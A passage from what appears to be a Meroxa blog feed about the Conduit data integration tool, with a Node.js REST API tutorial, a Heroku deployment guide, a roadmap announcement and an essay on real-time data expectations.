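  "tasks.max": "1", // hypothetical Kafka Connect setting
});
console.log(Object.keys(wrapper).length, Object.keys(passthrough).length); // 1 2
```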
&lt;h3&gt;Check Out the Rest&lt;/h3&gt;
&lt;p&gt;Creating connectors represents only a portion of what we released for Conduit 0.2. For all of the changes, make sure to check out the changelog on the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.2.0&quot;&gt;releases page&lt;/a&gt; for 0.2. Join us on &lt;a href=&quot;https://github.com/conduitio/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt; or &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; for any questions or feedback on where we’re taking Conduit.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Writing Data Integration Software with the Conduit REST API]]></title><description><![CDATA[Since Conduit ships as a tiny single binary, it functions as a powerful tool that allows you to efficiently move data from one place to another.]]></description><link>https://meroxa.com/blog/writing-data-integration-software-with-the-conduit-rest-api</link><guid isPermaLink="false">https://meroxa.com/blog/writing-data-integration-software-with-the-conduit-rest-api</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Thu, 24 Mar 2022 16:36:00 GMT</pubDate><content:encoded>&lt;p&gt;Today, software engineers have a lot of tools to move data from one place to another. &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;, our OSS data integration tool written in Go, includes an API that devs can use to programmatically build pipelines. Since Conduit ships as a tiny single binary, it functions as a powerful tool that allows you to efficiently move data from one place to another.&lt;/p&gt;
&lt;p&gt;Today, Conduit provides &lt;a href=&quot;https://docs.conduit.io/api&quot;&gt;RESTful HTTP&lt;/a&gt; and &lt;a href=&quot;https://grpc.io/&quot;&gt;gRPC&lt;/a&gt; Pipeline APIs that allow you to perform actions such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Creating data pipelines&lt;/li&gt;
&lt;li&gt;Creating connectors (ex. PostgreSQL, Kafka, File, etc.)&lt;/li&gt;
&lt;li&gt;Starting/stopping pipelines&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These APIs allow you to fully manage the lifecycle of a pipeline, from creation to teardown. Even though Conduit provides both of these interfaces, the examples and use case in the rest of this guide will focus on the HTTP API.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/0_tMT1erip9pc-NnFY.png&quot; alt=&quot;0_tMT1erip9pc-NnFY&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Why is this important?&lt;/h3&gt;
&lt;p&gt;Having access to an API is important when writing software that moves data around and allows us to think differently about writing data integration software. Here are the three advantages:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Abstraction&lt;/strong&gt; — The software you write can focus on the task at hand rather than on the mechanics of moving data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Automation&lt;/strong&gt; — Your code can fully automate the pipeline lifecycle. You can build tools to orchestrate data movement. All you need is the Conduit binary and an HTTP library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Language-Agnostic&lt;/strong&gt; — You can interface with the HTTP server from any programming language.&lt;/p&gt;
&lt;h3&gt;Creating a Pipeline using Node.js&lt;/h3&gt;
&lt;p&gt;For example, let’s say you wanted to build a new tool that moves data from PostgreSQL to a file. This could be the case for performing a data backup or downloading data for analysis. In this case, the tool’s job is to move data from one place to another.&lt;/p&gt;
&lt;p&gt;Now, there are many ways to approach this problem. But here, I’ll describe how we could approach this with Conduit. In this case, we can write a script that uses the HTTP API to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a new pipeline.&lt;/li&gt;
&lt;li&gt;Create a &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;PostgreSQL connector&lt;/a&gt; to query data from PostgreSQL.&lt;/li&gt;
&lt;li&gt;Create a File Connector to store the result in a file.&lt;/li&gt;
&lt;li&gt;Run the Pipeline.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Note: &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started&quot;&gt;Conduit does ship with a UI&lt;/a&gt; that gives you an easy-to-use interface to build pipelines, and it is a great place to start. However, building the pipeline with code lets us review, commit, and deploy this pipeline like the other critical components of our infrastructure. With Conduit, you can stop writing one-off scripts to move data.&lt;/p&gt;
&lt;p&gt;At a high level, here are the tasks our code needs to perform:&lt;/p&gt;
&lt;p&gt;First, &lt;a href=&quot;https://www.conduit.io/docs/introduction/getting-started&quot;&gt;start Conduit to get the REST API server up and running&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/0_5zvZwcMqov6Rio4w.png&quot; alt=&quot;0_5zvZwcMqov6Rio4w&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the above graphic, you can see the HTTP server by default runs on port 8080 and the gRPC server runs on port 8084.&lt;/p&gt;
&lt;p&gt;Next, we can use any generic HTTP client from any language to interact with the Conduit API. Here is an example using the Node.js &lt;a href=&quot;https://github.com/axios/axios&quot;&gt;Axios HTTP library&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;javascript&quot;&gt;&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;const axios = require(&apos;axios&apos;);

const POSTGRES_TABLE = &apos;my_table&apos;;
const POSTGRES_URL = &apos;postgres://user:password@host:port/database&apos;;
const CONDUIT_HOST = &apos;http://localhost:8080&apos;;

// A function to call the Conduit API
async function createConnector(config) {
  try {
    const pipeline = await axios.post(`${CONDUIT_HOST}/v1/connectors`, config);
    return pipeline.data;
  } catch (error) {
    console.log(error);
    throw Error(&apos;Could not create connector&apos;);
  }
}

const main = async () =&gt; {
  // NOTE: `pipeline` is assumed to have been created beforehand; its creation
  // is not shown in this snippet.
  // Connector configuration.
  // See more: https://github.com/ConduitIO/conduit-connector-postgres
  const postgresConfig = {
    type: &apos;TYPE_SOURCE&apos;,
    plugin: `/pkg/plugins/pg/pg`,
    pipelineId: pipeline.id,
    config: {
      name: &apos;pg&apos;,
      settings: {
        table: POSTGRES_TABLE,
        url: POSTGRES_URL,
        cdc: &apos;false&apos;,
      },
    },
  };

  const connector = await createConnector(postgresConfig);
  console.log(pipeline, connector);
};

main();&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
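&lt;p&gt;The example above reads &lt;code class=&quot;language-text&quot;&gt;pipeline.id&lt;/code&gt;, but the pipeline-creation step itself is not shown. A hedged sketch of that step against Conduit&apos;s HTTP API (the &lt;code class=&quot;language-text&quot;&gt;/v1/pipelines&lt;/code&gt; endpoint comes from Conduit&apos;s API reference; the pipeline name and description are illustrative):&lt;/p&gt;

```javascript
// Sketch only: create the pipeline that the connector snippet assumes exists.
// buildCreatePipelineRequest() constructs the request so its shape is easy to
// inspect without a running server; createPipeline() actually performs it
// (requires a running Conduit instance and Node 18+ global fetch).
const CONDUIT_HOST = "http://localhost:8080";

function buildCreatePipelineRequest(name) {
  return {
    url: `${CONDUIT_HOST}/v1/pipelines`,
    method: "POST",
    // Pipeline name/description here are illustrative placeholders.
    body: JSON.stringify({ config: { name, description: "created via REST" } }),
  };
}

async function createPipeline(name) {
  const req = buildCreatePipelineRequest(name);
  const res = await fetch(req.url, {
    method: req.method,
    headers: { "Content-Type": "application/json" },
    body: req.body,
  });
  return res.json(); // the created pipeline, including its `id`
}

const req = buildCreatePipelineRequest("pg-to-file");
console.log(req.method, req.url);
```

&lt;p&gt;Separating the request construction from the call keeps the payload easy to inspect and test without a running Conduit instance.&lt;/p&gt;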
&lt;p&gt;To dig in deeper, you can download and run a full example &lt;a href=&quot;https://github.com/anaptfox/movegres&quot;&gt;from Github&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;What’s Next:&lt;/h3&gt;
&lt;p&gt;I hope this serves as the foundation for your next big data project. Now it’s your turn to give this example a try for your own use case, or try it in another programming language.&lt;/p&gt;
&lt;p&gt;Here are some guides you can use to dig into Conduit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.conduit.io/guides/creating-a-pipeline-with-swagger-ui&quot;&gt;How to test Conduit’s REST API with Swagger UI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.conduit.io/guides/how-to-add-conduit-to-your-path&quot;&gt;How to add Conduit to your Path&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here are some ways you can connect with us:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Chat with the Conduit team in the &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord Community&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Request features or ask questions about Conduit in &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Send bug reports to &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues&quot;&gt;GitHub Issues&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Check out the &lt;a href=&quot;https://conduit-site.vercel.app/&quot;&gt;Conduit Documentation&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Show us love on &lt;a href=&quot;https://twitter.com/ConduitIO&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can’t wait to see what you build 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Deploying Conduit on Heroku]]></title><description><![CDATA[Conduit is a tool to move data around and Heroku is an application platform.]]></description><link>https://meroxa.com/blog/deploying-conduit-on-herokudeploying-conduit-on-heroku</link><guid isPermaLink="false">https://meroxa.com/blog/deploying-conduit-on-herokudeploying-conduit-on-heroku</guid><dc:creator><![CDATA[Lyric Hartley]]></dc:creator><pubDate>Thu, 10 Mar 2022 17:44:00 GMT</pubDate><content:encoded>&lt;p&gt;If you are not familiar with &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit&lt;/a&gt;, you can get the low down &lt;a href=&quot;/blog/why-conduit-an-evolutionary-leap-forward-for-real-time-data-integration&quot;&gt;here&lt;/a&gt;. If you don’t know about &lt;a href=&quot;https://www.heroku.com/&quot;&gt;Heroku&lt;/a&gt; either, you may be feeling lost. No worries, I am here to help. The short version: Conduit is a tool to move data around and Heroku is an application platform. Ok, let’s get the two hitched up.&lt;/p&gt;
&lt;h3&gt;Intro&lt;/h3&gt;
&lt;p&gt;Why might you want to deploy Conduit on Heroku? Heroku provides an easy platform to get an application up and going. It has some free data resources like PostgreSQL as well. This gives you &lt;a href=&quot;https://devcenter.heroku.com/articles/free-dyno-hours&quot;&gt;free hosting&lt;/a&gt; and data for Conduit!&lt;/p&gt;
&lt;h3&gt;Methods of Deploy&lt;/h3&gt;
&lt;p&gt;At a high level, there are two options: deploy Conduit pre-built or build it on Heroku. The advantage of deploying the pre-built version is that dependencies will already be met. The downside is that you can’t change the build configuration. We will touch on why you may want to tweak the build configuration in the “Considerations” Section.&lt;/p&gt;
&lt;h3&gt;Docker&lt;/h3&gt;
&lt;p&gt;Using &lt;a href=&quot;https://devcenter.heroku.com/categories/deploying-with-docker&quot;&gt;Heroku’s Docker&lt;/a&gt; support makes deploying the latest &lt;a href=&quot;https://github.com/ConduitIO/conduit#docker&quot;&gt;Conduit to Heroku&lt;/a&gt; easy as it gathers your dependencies. Docker operates a little bit differently than regular Heroku deploys. You can look over the details &lt;a href=&quot;https://devcenter.heroku.com/articles/build-docker-images-heroku-yml&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;You can test this method via &lt;a href=&quot;https://github.com/ahamidi/conduit-on-heroku&quot;&gt;this repo&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Go Binary&lt;/h3&gt;
&lt;p&gt;Conduit provides a Go binary as part of each release. The latest can be found &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/latest&quot;&gt;here&lt;/a&gt;. To deploy a &lt;a href=&quot;https://go.dev/&quot;&gt;Go&lt;/a&gt; binary to Heroku you will need to give Heroku something to detect. For example, we use a package.json file to trick the build process in this repo.&lt;/p&gt;
&lt;p&gt;You can test this method via the button below, which is based on version 0.11 of Conduit.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://heroku.com/deploy?template=https://github.com/lyric-meroxa/conduit-button&quot;&gt;&lt;img src=&quot;https://miro.medium.com/max/298/1*hiUCsGXwe8dQlSe2phN1_Q.png&quot; alt=&quot;Deploy to Heroku&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When the deploy is done, you can click &lt;strong&gt;View&lt;/strong&gt; or &lt;strong&gt;Manage &gt; View&lt;/strong&gt; to open the app in the browser. You may need to change the base URL to land on the Admin UI.&lt;/p&gt;
&lt;p&gt;The base URL will be:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;https://[application-name].herokuapp.com/ui/pipelines&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*ap6ZmnjdrysBc_RTcqCLVw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Conduit UI&lt;/p&gt;
&lt;h3&gt;A Conduit GitHub Repo&lt;/h3&gt;
&lt;p&gt;You can deploy Conduit to Heroku using the &lt;a href=&quot;https://elements.heroku.com/buildpacks/heroku/heroku-buildpack-go&quot;&gt;Go buildpack&lt;/a&gt;. We provide a test version of this method via the button below. This version does not have the UI enabled for security reasons (see below). To learn more about building Conduit from source, you can reference the &lt;a href=&quot;https://github.com/ConduitIO/conduit#build-from-source&quot;&gt;build instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://heroku.com/deploy?template=https://github.com/lyric-meroxa/conduit/tree/Heroku-button&quot;&gt;&lt;img src=&quot;https://miro.medium.com/max/298/1*hiUCsGXwe8dQlSe2phN1_Q.png&quot; alt=&quot;Deploy to Heroku&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Considerations&lt;/h3&gt;
&lt;h4&gt;Persisting Configuration&lt;/h4&gt;
&lt;p&gt;By default, Conduit stores its configuration on the local disk in &lt;code class=&quot;language-text&quot;&gt;conduit.db&lt;/code&gt;. Heroku has an &lt;a href=&quot;https://devcenter.heroku.com/articles/active-storage-on-heroku#ephemeral-disk&quot;&gt;ephemeral file system&lt;/a&gt;, which means you will lose your configuration whenever the file system is “reset”, and that happens on every restart. Dynos are &lt;a href=&quot;https://devcenter.heroku.com/articles/dynos#automatic-dyno-restarts&quot;&gt;restarted every 24 hours&lt;/a&gt; and any time there is a new “release” or deploy. You will want to add a &lt;a href=&quot;https://www.heroku.com/postgres&quot;&gt;Heroku PostgreSQL addon&lt;/a&gt; and use the option below as part of your start command to tell Conduit to store the configs in PostgreSQL.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;web: ./conduit -db.postgres.connection-string $DATABASE_URL&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can use this &lt;a href=&quot;https://github.com/lyric-meroxa/conduit-button/blob/main/Procfile&quot;&gt;Procfile&lt;/a&gt; as an example. The deploy buttons above include the addon and this option.&lt;/p&gt;
&lt;h4&gt;HTTP API Port binding&lt;/h4&gt;
&lt;p&gt;Heroku web apps &lt;a href=&quot;https://devcenter.heroku.com/articles/dynos#web-dynos&quot;&gt;bind&lt;/a&gt; to &lt;code class=&quot;language-text&quot;&gt;$PORT&lt;/code&gt; when they start up. By default, Conduit uses port 8080, which will not work. You will need to set the port for Conduit via the following flag. Note the leading &lt;code class=&quot;language-text&quot;&gt;:&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;./conduit &lt;span class=&quot;token parameter variable&quot;&gt;-http.address&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PORT&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
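&lt;p&gt;Putting this together with the persistence flag from the previous section, a complete Procfile might look like the following (a sketch; the deploy-button repos linked above are the authoritative examples):&lt;/p&gt;

```text
web: ./conduit -db.postgres.connection-string $DATABASE_URL -http.address :$PORT
```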
&lt;h4&gt;Conduit HTTP security&lt;/h4&gt;
&lt;p&gt;The Conduit UI does not currently have authentication in front of it. One option is to build Conduit without the UI (like in the Go repo button above). This would be better for production deploys. If you still want a UI, you have a couple of options.&lt;/p&gt;
&lt;p&gt;You can add a buildpack like the &lt;a href=&quot;https://elements.heroku.com/buildpacks/heroku/heroku-buildpack-nginx&quot;&gt;nginx buildpack&lt;/a&gt; and &lt;a href=&quot;https://docs.nginx.com/nginx/admin-guide/security-controls/configuring-http-basic-authentication/&quot;&gt;configure it&lt;/a&gt; to provide authentication. Or, in the Procfile, you can set your &lt;a href=&quot;https://devcenter.heroku.com/articles/process-model&quot;&gt;process type&lt;/a&gt; to something other than &lt;code class=&quot;language-text&quot;&gt;web:&lt;/code&gt;, e.g. &lt;code class=&quot;language-text&quot;&gt;worker:&lt;/code&gt;, and it will not bind to a port connected to the public internet. While this may work well in Private Spaces (or using an &lt;a href=&quot;https://devcenter.heroku.com/articles/internal-routing&quot;&gt;internally routed&lt;/a&gt; dyno), it may not be viable in the Common Runtime (e.g. a free dyno).&lt;/p&gt;
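&lt;p&gt;As a rough sketch of the nginx approach (the exact file layout depends on the buildpack; the paths and port below are assumptions, not tested configuration), a location block could require basic auth before proxying to Conduit:&lt;/p&gt;

```nginx
# Hypothetical fragment for an nginx buildpack config.
# Assumes Conduit listens on localhost:8080 and that an
# .htpasswd file has been generated into the app slug.
location / {
  auth_basic           "Conduit";
  auth_basic_user_file /app/.htpasswd;
  proxy_pass           http://127.0.0.1:8080;
}
```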
&lt;h4&gt;No gRPC API support&lt;/h4&gt;
&lt;p&gt;gRPC requires HTTP/2, and Heroku &lt;a href=&quot;https://devcenter.heroku.com/articles/http-routing#not-supported&quot;&gt;does not currently support HTTP/2&lt;/a&gt;. So, you will not be able to use the gRPC admin API.&lt;/p&gt;
&lt;h3&gt;What’s Next?&lt;/h3&gt;
&lt;p&gt;Now that you have Conduit up and going, you can visit &lt;a href=&quot;https://www.conduit.io/&quot;&gt;Conduit.io&lt;/a&gt;, view the docs in the &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;repo&lt;/a&gt;, and get started building pipelines!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.conduit.io/docs/connectors/postgres/overview&quot;&gt;PostgreSQL Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.conduit.io/docs/connectors/kafka/overview&quot;&gt;Kafka Connector&lt;/a&gt; (may require a Private Space)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/issues&quot;&gt;Let us know if you have any issues!&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit Now and Into the Future]]></title><description><![CDATA[The Conduit roadmap is meant to provide insight into the major bodies of work we want to achieve within any given release.]]></description><link>https://meroxa.com/blog/conduit-now-and-into-the-future</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-now-and-into-the-future</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Wed, 09 Mar 2022 17:49:00 GMT</pubDate><content:encoded>&lt;p&gt;Today, we’re excited to announce the &lt;a href=&quot;https://github.com/orgs/ConduitIO/projects/3/views/1&quot;&gt;public roadmap&lt;/a&gt; for &lt;a href=&quot;https://www.conduit.io/&quot;&gt;Conduit&lt;/a&gt;, our open-source data integration tool. The Conduit team manages all features and bugs in GitHub Issues within the repo, but the sheer volume of issues can make it hard to decipher the overarching goal of a release. The Conduit roadmap is meant to provide insight into the major bodies of work we want to achieve within any given release. This will bring transparency to what’s being prioritized, why it’s being prioritized, and more importantly, when to expect it.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*2lX1dGsswTJI0Cr1&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;An essential factor in the execution of our roadmap is the release process. Conduit will follow a six-month cycle. This means we won’t delay a release for a feature. If a feature is slated to be in the next version, but we can’t complete it by the time the release goes out, it’ll go out in the following version. We feel release consistency is more important than features. The driving force behind this decision is the supportability of releases. The team is committed to supporting the last three versions of Conduit. Every version will be fully supported for a year and a half before it’s deprecated. Let’s walk through an example where we’re currently working on 0.6 and have already released versions 0.2 through 0.5:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*odUGf6fDUWV3Z76v&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The roadmap will show what’s planned for the next two releases and a list of future features that illustrate the vision for Conduit. Any issues that you find within the Conduit repo tagged with &lt;code class=&quot;language-text&quot;&gt;roadmap&lt;/code&gt; are features and bugs that are “must-haves” for any given release. That doesn’t mean we won’t get other issues and bugs into a release. It just means the team will work on these items first. Also, if you want to test any of these features before the official launch, you can check out the nightly releases to kick the tires on new functionality. Note that if you’re interested in contributing, we’ll make every effort to get your PR merged into the current release.&lt;/p&gt;
&lt;p&gt;We’re committed to working on Conduit in the open with the community. Significant changes to the roadmap or shifts in the timeline will be communicated via the &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;Discussions&lt;/a&gt; section of the Conduit repository on GitHub.&lt;/p&gt;
&lt;h3&gt;Share your feedback and stay connected&lt;/h3&gt;
&lt;p&gt;If you have any questions, comments, or input on the direction of Conduit, please join us on the Conduit &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;Discussions&lt;/a&gt; page or on &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt;. If you’d rather share in private, you can also reach out to me directly at &lt;a href=&quot;mailto:rimas@meroxa.io&quot;&gt;rimas@meroxa.io&lt;/a&gt;. I’m looking forward to working with you on making streaming data work between your production data stores. 🎉🎉🎉🎉&lt;/p&gt;</content:encoded></item><item><title><![CDATA[“Real-time” is becoming the default expectation. What's holding it back?]]></title><description><![CDATA[The world is trending towards more rapid delivery of goods and services. We use the term “Real-time” to mean that it happens as close to “now” as possible.]]></description><link>https://meroxa.com/blog/real-time-is-becoming-the-default-expectation.-whats-holding-it-back</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-is-becoming-the-default-expectation.-whats-holding-it-back</guid><dc:creator><![CDATA[Lyric Hartley]]></dc:creator><pubDate>Fri, 25 Feb 2022 14:00:00 GMT</pubDate><content:encoded>&lt;p&gt;The world keeps moving faster, trending towards more rapid delivery of goods, services, and ideas. We use the term “Real-time” to mean that it happens as close to “now” as possible. For ideas, the internet is an obvious multiplier and we can easily see how it enables information to spread at, well, close to the speed of light.&lt;/p&gt;
&lt;p&gt;A number of new technologies aim to accelerate this for goods and services as the &lt;strong&gt;expectations for “faster” continue to grow&lt;/strong&gt;. In PwC’s June 2021 Global Consumer Insights Survey, 87% of responding consumers ranked &lt;strong&gt;reliability&lt;/strong&gt; and &lt;strong&gt;fast delivery&lt;/strong&gt; as top concerns when shopping online. After reading that stat, a few questions came to mind:&lt;/p&gt;
&lt;p&gt;What is at the core of those feelings?&lt;/p&gt;
&lt;p&gt;What should we be thinking about as the world trends towards “real-time” being the default expectation in all domains?&lt;/p&gt;
&lt;p&gt;What does this mean for businesses?&lt;/p&gt;
&lt;p&gt;Let’s tease this apart a bit.&lt;/p&gt;
&lt;h3&gt;Time is scarce and valuable&lt;/h3&gt;
&lt;p&gt;Time is finite; it keeps moving forward no matter what we think about it. As more things are required of us, the time they consume becomes more valuable. Time is one of our most scarce, non-renewable resources. We may be able to backfill some resources, but not time. We’re all getting pulled into this new speedy world of change whether we want to or not: someone demands something speedy from you, and you, in turn, require speedy results from someone else.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Scarcity increases value&lt;/strong&gt; and &lt;strong&gt;time is becoming increasingly scarce.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The thing that then begins to differentiate you from your competitor is &lt;strong&gt;how long it takes for the customer to get value&lt;/strong&gt; from what you offer.&lt;/p&gt;
&lt;p&gt;You can set yourself apart by showing that you &lt;strong&gt;value your customer’s time more than your competitors&lt;/strong&gt;. Showing them that you care.&lt;/p&gt;
&lt;p&gt;However, speed is only one part of the equation. &lt;strong&gt;It has to be accurate as well&lt;/strong&gt;, or the time it takes to fix mistakes is wasted. That is often more frustrating than the time “saved” on the front end, and it will certainly reflect on the image of the company.&lt;/p&gt;
&lt;h3&gt;Value the customer’s time&lt;/h3&gt;
&lt;p&gt;Businesses have historically focused on saving time &lt;em&gt;internally&lt;/em&gt;, trying to make the business itself more efficient. However, today’s businesses have to focus on &lt;strong&gt;empathy for the customer&lt;/strong&gt; by saving them time. Companies that send customers the message that they &lt;strong&gt;don’t value their time will lose&lt;/strong&gt;…unless they have a monopoly (looking at you, DMV).&lt;/p&gt;
&lt;h3&gt;Customers expect fast and reliable&lt;/h3&gt;
&lt;p&gt;While your business goals may be focused on your external customers, your internal “customers” will have the same expectations when it comes to speed and accuracy of information. You can see this in the numerous companies that serve internal teams. Those teams used to send that work to another internal team, like IT, but found they could get their needs met externally from someone who could deliver on the promise more &lt;strong&gt;reliably and faster&lt;/strong&gt;. So, they pulled out that corporate card with a quickness.&lt;/p&gt;
&lt;p&gt;Not all time wasters are in shipping or inaccuracies, though. &lt;strong&gt;A company can also show a lack of empathy by wasting the customer’s time with, for example, a design or data that is not actionable.&lt;/strong&gt; People already have expectations in some of these areas, and over time they will have them in all of them. It is best to understand that now.&lt;/p&gt;
&lt;p&gt;It can be boiled down to the time it takes to do something, or even to decide whether to do it. This is why we see an increase in &lt;strong&gt;frictionless design&lt;/strong&gt;: for example, “One-Click” buying, intuitive interface designs, intelligent options or defaults, and other time-savers.&lt;/p&gt;
&lt;p&gt;We now expect things to be “smooth”; if they aren’t, it feels like a waste of time.&lt;/p&gt;
&lt;p&gt;An example of internal vs external user experience that comes to mind is the difference between Amazon’s regular customer experience and that of AWS. The Amazon.com site meets (and sets) many of the expectations for speed and reliability. While using AWS often feels like the opposite. That may converge over time. If not, startups will continue to pop up around making a smoother experience to fill the gap.&lt;/p&gt;
&lt;p&gt;You may be thinking “ok, I get it, folks now expect things in ‘real-time’ or as close to it as possible”, soooo… what is the holdup?&lt;/p&gt;
&lt;h3&gt;What is holding us back?&lt;/h3&gt;
&lt;p&gt;There are a few things slowing, or in some cases stopping, the realization of “everything real-time all the time!”. Some things we just have to live with, but others we can do something about.&lt;/p&gt;
&lt;h3&gt;Physics&lt;/h3&gt;
&lt;p&gt;One limit that rears its head is physics. If you work in tech for long, you will eventually get the question “why is it taking so long?!”. Sometimes it can be fixed, but sometimes you just have to say “we have not figured out how to go faster than the speed of light”. If you want to move 5TB of data across the world over the public internet, it just takes a bit of time. Sure, you can get a dedicated, better pipe, but eventually you hit the limits of physics. Want your product to magically appear after you order it? Same problem. Wouldn’t it be great if, when you needed salt, coffee, whatever, &lt;em&gt;bing&lt;/em&gt;, it appeared? It would be like that old show &lt;a href=&quot;https://en.wikipedia.org/wiki/I_Dream_of_Jeannie&quot;&gt;I Dream of Jeannie&lt;/a&gt;. Well, that’s not going to happen, but we can make changes to get as close as possible.&lt;/p&gt;
&lt;h3&gt;Legacy Systems&lt;/h3&gt;
&lt;p&gt;If physics is not the limitation, another common one is that &lt;strong&gt;existing systems don’t support going faster&lt;/strong&gt;. It could be that going faster is not yet cost-effective, that there is not enough demand for that option, or, more often than not, that it is a legacy industry that &lt;strong&gt;has not caught up&lt;/strong&gt; yet. The pandemic forced many companies to undergo a “Digital Transformation”, so many are getting closer to the current expectation. This is good for them, because the pandemic also spread the speed expectation as people broke out of their old habits, whether by working from home, ordering online more, ordering food, etc.&lt;/p&gt;
&lt;h3&gt;Mindset&lt;/h3&gt;
&lt;p&gt;Another reason, which may seem silly but is very common, is simply that the folks working on a system have &lt;strong&gt;not stepped back and thought about it&lt;/strong&gt;. Seriously, how many things do we do just because we have always done them that way?&lt;/p&gt;
&lt;p&gt;Even in the days of pervasive, high-speed internet, where it seems like everything has been done or made and you can have it delivered to your house for free in two days, many of us don’t often step back and (re)think about &lt;strong&gt;why we are doing what we do&lt;/strong&gt; and whether there is &lt;strong&gt;a better way&lt;/strong&gt;. If you made it this far, I am guessing you are not one of those people.&lt;/p&gt;
&lt;p&gt;We can’t change physics, but if you are reading this, you likely have the right mindset. That leaves updating the tools to support another “new normal”. A normal where “real-time” is the default.&lt;/p&gt;
&lt;p&gt;No system can achieve “real-time” if the data it requires hasn’t. So, we have to start there. This is where &lt;a href=&quot;https://meroxa.io/&quot;&gt;Meroxa&lt;/a&gt; and &lt;a href=&quot;https://www.conduit.io/&quot;&gt;Conduit&lt;/a&gt; come to the rescue.&lt;/p&gt;
